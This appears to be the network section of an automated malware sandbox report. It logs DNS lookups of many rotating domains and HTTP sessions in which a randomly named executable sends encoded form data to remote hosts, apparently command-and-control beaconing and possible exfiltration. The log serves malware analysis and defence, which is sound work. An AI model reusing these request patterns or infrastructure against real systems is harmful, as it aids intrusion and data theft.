Jul 8, 2024 09:36:56.219664097 CEST | 80 | 49785 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:56.219674110 CEST | 80 | 49785 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:56.219685078 CEST | 80 | 49785 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:56.219741106 CEST | 80 | 49785 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:56.219750881 CEST | 80 | 49785 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:56.219938040 CEST | 80 | 49785 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:56.220067978 CEST | 80 | 49785 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:56.220120907 CEST | 80 | 49785 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:56.709939003 CEST | 80 | 49785 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:56.710658073 CEST | 80 | 49785 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:56.718563080 CEST | 49785 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:57.717845917 CEST | 49785 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:58.738568068 CEST | 49786 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:58.744601011 CEST | 80 | 49786 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:58.748591900 CEST | 49786 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:58.748591900 CEST | 49786 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:58.753415108 CEST | 80 | 49786 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:59.205349922 CEST | 80 | 49786 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:59.206052065 CEST | 80 | 49786 | 103.168.172.37 | 192.168.2.4
Jul 8, 2024 09:36:59.206255913 CEST | 49786 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:59.210547924 CEST | 49786 | 80 | 192.168.2.4 | 103.168.172.37
Jul 8, 2024 09:36:59.215289116 CEST | 80 | 49786 | 103.168.172.37 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 8, 2024 09:33:28.793044090 CEST | 54647 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:33:28.807867050 CEST | 53 | 54647 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:33:44.346595049 CEST | 52941 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:33:44.842729092 CEST | 53 | 52941 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:33:57.955666065 CEST | 57792 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:33:57.968626022 CEST | 53 | 57792 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:34:18.049755096 CEST | 51793 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:34:18.236051083 CEST | 53 | 51793 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:34:31.503925085 CEST | 54437 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:34:31.517043114 CEST | 53 | 54437 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:34:44.626982927 CEST | 51925 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:34:44.785440922 CEST | 53 | 51925 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:35:13.284638882 CEST | 61743 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:35:13.553808928 CEST | 53 | 61743 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:35:26.756666899 CEST | 64685 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:35:26.796458006 CEST | 53 | 64685 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:35:39.909708977 CEST | 53542 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:35:40.860340118 CEST | 53 | 53542 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:35:54.409833908 CEST | 57145 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:35:55.406713963 CEST | 57145 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:35:55.523142099 CEST | 53 | 57145 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:35:55.527589083 CEST | 53 | 57145 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:36:29.521048069 CEST | 61953 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:36:29.539968967 CEST | 53 | 61953 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:36:42.850632906 CEST | 59086 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:36:42.860693932 CEST | 53 | 59086 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:36:50.924501896 CEST | 53014 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:36:51.130835056 CEST | 53 | 53014 | 1.1.1.1 | 192.168.2.4
Jul 8, 2024 09:37:04.646394968 CEST | 53243 | 53 | 192.168.2.4 | 1.1.1.1
Jul 8, 2024 09:37:04.660160065 CEST | 53 | 53243 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 8, 2024 09:33:28.793044090 CEST | 192.168.2.4 | 1.1.1.1 | 0x41b2 | Standard query (0) | www.angrytee.com | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:33:44.346595049 CEST | 192.168.2.4 | 1.1.1.1 | 0xfe02 | Standard query (0) | www.orthonow.live | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:33:57.955666065 CEST | 192.168.2.4 | 1.1.1.1 | 0x12e0 | Standard query (0) | www.boutiqueinaboxshop.com | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:34:18.049755096 CEST | 192.168.2.4 | 1.1.1.1 | 0x8c47 | Standard query (0) | www.lmsforsme.com | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:34:31.503925085 CEST | 192.168.2.4 | 1.1.1.1 | 0x7978 | Standard query (0) | www.fundraiserstuffies.com | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:34:44.626982927 CEST | 192.168.2.4 | 1.1.1.1 | 0x5ecd | Standard query (0) | www.soutsour.xyz | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:35:13.284638882 CEST | 192.168.2.4 | 1.1.1.1 | 0xb889 | Standard query (0) | www.mysticriverpath.com | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:35:26.756666899 CEST | 192.168.2.4 | 1.1.1.1 | 0xf8a3 | Standard query (0) | www.mscuration.com | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:35:39.909708977 CEST | 192.168.2.4 | 1.1.1.1 | 0xa58d | Standard query (0) | www.wb515.com | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:35:54.409833908 CEST | 192.168.2.4 | 1.1.1.1 | 0x8e25 | Standard query (0) | www.hf7777hi.net | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:35:55.406713963 CEST | 192.168.2.4 | 1.1.1.1 | 0x8e25 | Standard query (0) | www.hf7777hi.net | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:36:29.521048069 CEST | 192.168.2.4 | 1.1.1.1 | 0xcbb6 | Standard query (0) | www.qrdinamicos.com | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:36:42.850632906 CEST | 192.168.2.4 | 1.1.1.1 | 0xe407 | Standard query (0) | www.personal-stylist.club | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:36:50.924501896 CEST | 192.168.2.4 | 1.1.1.1 | 0x1982 | Standard query (0) | www.jleabres.com | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:37:04.646394968 CEST | 192.168.2.4 | 1.1.1.1 | 0x6a7c | Standard query (0) | www.pu6wac.buzz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 8, 2024 09:33:28.807867050 CEST | 1.1.1.1 | 192.168.2.4 | 0x41b2 | No error (0) | www.angrytee.com | angrytee.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 8, 2024 09:33:28.807867050 CEST | 1.1.1.1 | 192.168.2.4 | 0x41b2 | No error (0) | angrytee.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:33:28.807867050 CEST | 1.1.1.1 | 192.168.2.4 | 0x41b2 | No error (0) | angrytee.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:33:44.842729092 CEST | 1.1.1.1 | 192.168.2.4 | 0xfe02 | No error (0) | www.orthonow.live |  | 199.59.243.226 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:33:57.968626022 CEST | 1.1.1.1 | 192.168.2.4 | 0x12e0 | No error (0) | www.boutiqueinaboxshop.com | boutiqueinaboxshop.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 8, 2024 09:33:57.968626022 CEST | 1.1.1.1 | 192.168.2.4 | 0x12e0 | No error (0) | boutiqueinaboxshop.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:33:57.968626022 CEST | 1.1.1.1 | 192.168.2.4 | 0x12e0 | No error (0) | boutiqueinaboxshop.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:34:18.236051083 CEST | 1.1.1.1 | 192.168.2.4 | 0x8c47 | No error (0) | www.lmsforsme.com | lmsforsme.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 8, 2024 09:34:18.236051083 CEST | 1.1.1.1 | 192.168.2.4 | 0x8c47 | No error (0) | lmsforsme.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:34:18.236051083 CEST | 1.1.1.1 | 192.168.2.4 | 0x8c47 | No error (0) | lmsforsme.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:34:31.517043114 CEST | 1.1.1.1 | 192.168.2.4 | 0x7978 | No error (0) | www.fundraiserstuffies.com | fundraiserstuffies.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 8, 2024 09:34:31.517043114 CEST | 1.1.1.1 | 192.168.2.4 | 0x7978 | No error (0) | fundraiserstuffies.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:34:31.517043114 CEST | 1.1.1.1 | 192.168.2.4 | 0x7978 | No error (0) | fundraiserstuffies.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:34:44.785440922 CEST | 1.1.1.1 | 192.168.2.4 | 0x5ecd | No error (0) | www.soutsour.xyz |  | 203.161.41.207 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:35:13.553808928 CEST | 1.1.1.1 | 192.168.2.4 | 0xb889 | No error (0) | www.mysticriverpath.com | mysticriverpath.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 8, 2024 09:35:13.553808928 CEST | 1.1.1.1 | 192.168.2.4 | 0xb889 | No error (0) | mysticriverpath.com |  | 216.194.173.237 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:35:26.796458006 CEST | 1.1.1.1 | 192.168.2.4 | 0xf8a3 | No error (0) | www.mscuration.com | mscuration.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 8, 2024 09:35:26.796458006 CEST | 1.1.1.1 | 192.168.2.4 | 0xf8a3 | No error (0) | mscuration.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:35:26.796458006 CEST | 1.1.1.1 | 192.168.2.4 | 0xf8a3 | No error (0) | mscuration.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:35:40.860340118 CEST | 1.1.1.1 | 192.168.2.4 | 0xa58d | No error (0) | www.wb515.com | wb88.wb-88.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 8, 2024 09:35:40.860340118 CEST | 1.1.1.1 | 192.168.2.4 | 0xa58d | No error (0) | wb88.wb-88.com |  | 38.47.226.116 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:35:55.523142099 CEST | 1.1.1.1 | 192.168.2.4 | 0x8e25 | No error (0) | www.hf7777hi.net |  | 132.226.11.158 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:35:55.527589083 CEST | 1.1.1.1 | 192.168.2.4 | 0x8e25 | No error (0) | www.hf7777hi.net |  | 132.226.11.158 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:36:29.539968967 CEST | 1.1.1.1 | 192.168.2.4 | 0xcbb6 | No error (0) | www.qrdinamicos.com |  | 217.160.0.119 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:36:42.860693932 CEST | 1.1.1.1 | 192.168.2.4 | 0xe407 | Name error (3) | www.personal-stylist.club | none | none | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:36:51.130835056 CEST | 1.1.1.1 | 192.168.2.4 | 0x1982 | No error (0) | www.jleabres.com |  | 103.168.172.37 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:36:51.130835056 CEST | 1.1.1.1 | 192.168.2.4 | 0x1982 | No error (0) | www.jleabres.com |  | 103.168.172.52 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:37:04.660160065 CEST | 1.1.1.1 | 192.168.2.4 | 0x6a7c | No error (0) | www.pu6wac.buzz |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jul 8, 2024 09:37:04.660160065 CEST | 1.1.1.1 | 192.168.2.4 | 0x6a7c | No error (0) | www.pu6wac.buzz |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                              • www.angrytee.com
                                              • www.orthonow.live
                                              • www.boutiqueinaboxshop.com
                                              • www.lmsforsme.com
                                              • www.fundraiserstuffies.com
                                              • www.soutsour.xyz
                                              • www.mysticriverpath.com
                                              • www.mscuration.com
                                              • www.wb515.com
                                              • www.hf7777hi.net
                                              • www.qrdinamicos.com
                                              • www.jleabres.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
Timestamp | Bytes transferred | Direction | Data
Jul 8, 2024 09:33:28.821901083 CEST | 451 | OUT | GET /8vcs/?QdC=AFMh5N&gNl=S5368XARNWnsRPU79+engpq5FH91z/VvzYo3ppZunCrDl85kGpMYYQZ3LKQ1c9Pzm3jcz7UCsoRBkqoouNpmJgjgkplBk0Qbj7O+44Ma0M/QxRY+rJ4fr5w= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
Host: www.angrytee.com
User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Jul 8, 2024 09:33:29.289864063 CEST | 390 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 08 Jul 2024 07:33:29 GMT
Content-Type: text/html
Content-Length: 250
Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 64 43 3d 41 46 4d 68 35 4e 26 67 4e 6c 3d 53 35 33 36 38 58 41 52 4e 57 6e 73 52 50 55 37 39 2b 65 6e 67 70 71 35 46 48 39 31 7a 2f 56 76 7a 59 6f 33 70 70 5a 75 6e 43 72 44 6c 38 35 6b 47 70 4d 59 59 51 5a 33 4c 4b 51 31 63 39 50 7a 6d 33 6a 63 7a 37 55 43 73 6f 52 42 6b 71 6f 6f 75 4e 70 6d 4a 67 6a 67 6b 70 6c 42 6b 30 51 62 6a 37 4f 2b 34 34 4d 61 30 4d 2f 51 78 52 59 2b 72 4a 34 66 72 35 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QdC=AFMh5N&gNl=S5368XARNWnsRPU79+engpq5FH91z/VvzYo3ppZunCrDl85kGpMYYQZ3LKQ1c9Pzm3jcz7UCsoRBkqoouNpmJgjgkplBk0Qbj7O+44Ma0M/QxRY+rJ4fr5w="}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.4 | 49742 | 199.59.243.226 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:33:44.853055954 CEST | 719 | OUT | POST /v6z4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.orthonow.live
                                              Origin: http://www.orthonow.live
                                              Referer: http://www.orthonow.live/v6z4/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=i7mFwiKRMHBOlT8Iw6XFTILzP86MF6aKvsvOj/hTg8rhiRV48gWZ2Mnnl0EsvWPairZ0LupGu6H18WVXtkexFhr1RmcBKUNdZW8GnyBbCSNJtXXO0j9aUGzQBpdhzIPSlShs/90sFxInnQ2KCrexLG7BuO/Q1+ilv33iM2HXMqdPjbXBb+QxGY+iPljDeh8lQg==
                                              Jul 8, 2024 09:33:45.323097944 CEST | 1236 | IN | HTTP/1.1 200 OK
                                              date: Mon, 08 Jul 2024 07:33:44 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1118
                                              x-request-id: a1b5b676-e918-4b2e-b316-36eab24bb338
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UihT/PrO9RprL/3o0R1NpRYmtkPdF1qurjngCFFLzhjtzem9/Fvwb2rexnHMpuXf3fSsyJk7K/TE81ELr3GTIg==
                                              set-cookie: parking_session=a1b5b676-e918-4b2e-b316-36eab24bb338; expires=Mon, 08 Jul 2024 07:48:45 GMT; path=/
                                              connection: close
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UihT/PrO9RprL/3o0R1NpRYmtkPdF1qurjngCFFLzhjtzem9/Fvwb2rexnHMpuXf3fSsyJk7K/TE81ELr3GTIg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 8, 2024 09:33:45.323472977 CEST | 571 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTFiNWI2NzYtZTkxOC00YjJlLWIzMTYtMzZlYWIyNGJiMzM4IiwicGFnZV90aW1lIjoxNzIwNDI0MD


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.4 | 49743 | 199.59.243.226 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:33:47.384155035 CEST | 739 | OUT | POST /v6z4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.orthonow.live
                                              Origin: http://www.orthonow.live
                                              Referer: http://www.orthonow.live/v6z4/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=i7mFwiKRMHBO3gUIyZvFVoLwAc6MTKaWvsjOj9MUjKbhnBF49hWZ1MnntUE1l2PRirF8LrRGu5718SZX4H2+Exr7dGcHOUNdZW8Gnzx9CWhJtHnO3C9dI2zXGpdh3IPWlShC//AGFzwnnVKKC6eyCG6KqO+RkuLxtkCyKWLOMqpzidGbKPxmUYaRSiq3TiBsLl5wcUXQ3Rw1E//0aUeWwBk=
                                              Jul 8, 2024 09:33:47.856290102 CEST | 1236 | IN | HTTP/1.1 200 OK
                                              date: Mon, 08 Jul 2024 07:33:47 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1118
                                              x-request-id: 73fd2943-f3b8-4470-9d84-1eacb91a511b
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UihT/PrO9RprL/3o0R1NpRYmtkPdF1qurjngCFFLzhjtzem9/Fvwb2rexnHMpuXf3fSsyJk7K/TE81ELr3GTIg==
                                              set-cookie: parking_session=73fd2943-f3b8-4470-9d84-1eacb91a511b; expires=Mon, 08 Jul 2024 07:48:47 GMT; path=/
                                              connection: close
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UihT/PrO9RprL/3o0R1NpRYmtkPdF1qurjngCFFLzhjtzem9/Fvwb2rexnHMpuXf3fSsyJk7K/TE81ELr3GTIg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 8, 2024 09:33:47.856857061 CEST | 571 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzNmZDI5NDMtZjNiOC00NDcwLTlkODQtMWVhY2I5MWE1MTFiIiwicGFnZV90aW1lIjoxNzIwNDI0MD


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.2.4 | 49744 | 199.59.243.226 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:33:49.916208029 CEST | 10821 | OUT | POST /v6z4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.orthonow.live
                                              Origin: http://www.orthonow.live
                                              Referer: http://www.orthonow.live/v6z4/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl= [TRUNCATED]
                                              Jul 8, 2024 09:33:50.375546932 CEST | 1236 | IN | HTTP/1.1 200 OK
                                              date: Mon, 08 Jul 2024 07:33:50 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1118
                                              x-request-id: 2f18d322-f725-4ec0-b8c3-f9779a426067
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UihT/PrO9RprL/3o0R1NpRYmtkPdF1qurjngCFFLzhjtzem9/Fvwb2rexnHMpuXf3fSsyJk7K/TE81ELr3GTIg==
                                              set-cookie: parking_session=2f18d322-f725-4ec0-b8c3-f9779a426067; expires=Mon, 08 Jul 2024 07:48:50 GMT; path=/
                                              connection: close
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UihT/PrO9RprL/3o0R1NpRYmtkPdF1qurjngCFFLzhjtzem9/Fvwb2rexnHMpuXf3fSsyJk7K/TE81ELr3GTIg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 8, 2024 09:33:50.375857115 CEST | 571 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmYxOGQzMjItZjcyNS00ZWMwLWI4YzMtZjk3NzlhNDI2MDY3IiwicGFnZV90aW1lIjoxNzIwNDI0MD


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.4 | 49745 | 199.59.243.226 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:33:52.446778059 CEST | 452 | OUT | GET /v6z4/?gNl=v5OlzSyVHRQHkR8SzJ3gVKTFGeiNQ9a3rPHOxN5wltqCxit6zhqg4pXFuWsKngfZsZtYBOZhxp3bwCRN51e7LBPhb0MuJX9gMhQmuGphOmN3xULrqSpMXE0=&QdC=AFMh5N HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.orthonow.live
